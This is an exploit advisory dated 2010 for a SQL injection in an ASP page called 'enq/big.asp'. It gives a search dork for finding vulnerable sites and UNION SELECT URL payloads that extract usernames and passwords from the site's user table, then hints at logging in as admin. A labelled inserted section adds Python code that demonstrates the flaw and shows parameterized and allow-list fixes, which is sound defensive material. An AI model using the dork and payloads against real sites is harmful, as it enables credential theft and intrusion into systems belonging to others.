# Title : (big.asp) SQL Injection Vulnerability
# Published : 2010-05-08
# Author : Ra3cH
*******************************************************************************
# Price : N/A
# Site : www.dz4all.com/cc
# Dork : inurl:enq/big.asp?id=
# Risk : High
*
**Vulnerable script: enq/big.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/enq/big.asp?id= [SQL Inject]
*
*
**Exploit:
*
*
**-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1
*
*
**Example:
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
*
**or
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
*
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
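Added example (not part of the original advisory and not the application's code): the flaw class behind the `id` parameter and two fixes, shown in Python with sqlite3 as a stand-in for the ASP page. The `items` table, its three columns and all rows are constructed assumptions; only `user`, `user_name` and `user_pass` are names from the advisory.

```python
import re
import sqlite3

# Payload shape taken from the advisory, cut to the three columns of the
# constructed query below (the real column count belongs to big.asp).
PAYLOAD = "-999.9 UNION ALL SELECT null,user_name,user_pass from user where 1=1"
ID_RE = re.compile(r"[0-9]{1,9}")  # ASCII digits only, bounded length

def make_db():
    """Constructed schema and rows; only `user`, `user_name` and `user_pass`
    are names from the advisory, `items` is hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE user (user_name TEXT, user_pass TEXT);
        INSERT INTO items VALUES (1, 'Widget', 'constructed sample row');
        INSERT INTO user VALUES ('admin', 'constructed-secret');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # The flaw: the request value becomes part of the SQL text.
    return db.execute(
        "SELECT id, title, body FROM items WHERE id = " + raw_id).fetchall()

def lookup_bound(db, raw_id):
    # Fix 1: bind the value; the driver never parses it as SQL.
    return db.execute(
        "SELECT id, title, body FROM items WHERE id = ?", (raw_id,)).fetchall()

def lookup_hardened(db, raw_id):
    # Fix 2: allow-list the format first, then bind as an integer.
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("id must be a positive integer")
    return lookup_bound(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    print("bound:     ", lookup_bound(db, PAYLOAD))
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened:  rejected,", exc)
    print("hardened:  ", lookup_hardened(db, "1"))
```

In classic ASP the equivalent of `lookup_hardened` is a digits-only check on `Request.QueryString("id")` followed by an `ADODB.Command` with a bound integer parameter instead of string concatenation.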
*""""""""""""""""""""
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &